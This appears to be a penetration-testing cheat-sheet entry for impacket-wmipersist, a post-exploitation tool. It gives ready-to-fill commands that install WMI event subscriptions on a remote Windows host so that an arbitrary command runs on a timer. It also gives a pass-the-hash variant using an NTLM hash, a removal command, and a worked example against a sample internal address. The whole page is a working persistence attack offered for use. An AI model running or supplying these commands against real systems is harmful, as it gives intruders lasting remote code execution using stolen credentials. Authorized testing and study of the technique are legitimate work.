Impacket WMI Persist

Install or remove WMI event subscriptions for remote persistence

Tool
impacket-wmipersist
Category
Post-Exploitation / Persistence
Platform
linux
Requires
password
Protocols
WMI

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-wmipersist '<domain>/<user>:<password>'@'<ip>' -action install -name '<name>' -executeOn 'TimerEvent' -command '<cmd>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-wmipersist -hashes ':<hash>' '<domain>/<user>'@'<ip>' -action install -name '<name>' -executeOn 'TimerEvent' -command '<cmd>'

Remove Persistence requires password

impacket-wmipersist '<domain>/<user>:<password>'@'<ip>' -action remove -name '<name>'

Examples

impacket-wmipersist 'CORP.LOCAL/user:password'@192.168.1.100 -action install -name 'Updater' -executeOn 'TimerEvent' -command 'cmd.exe /c whoami > C:\\out.txt'

Tags

impacket wmi persistence event-subscription remote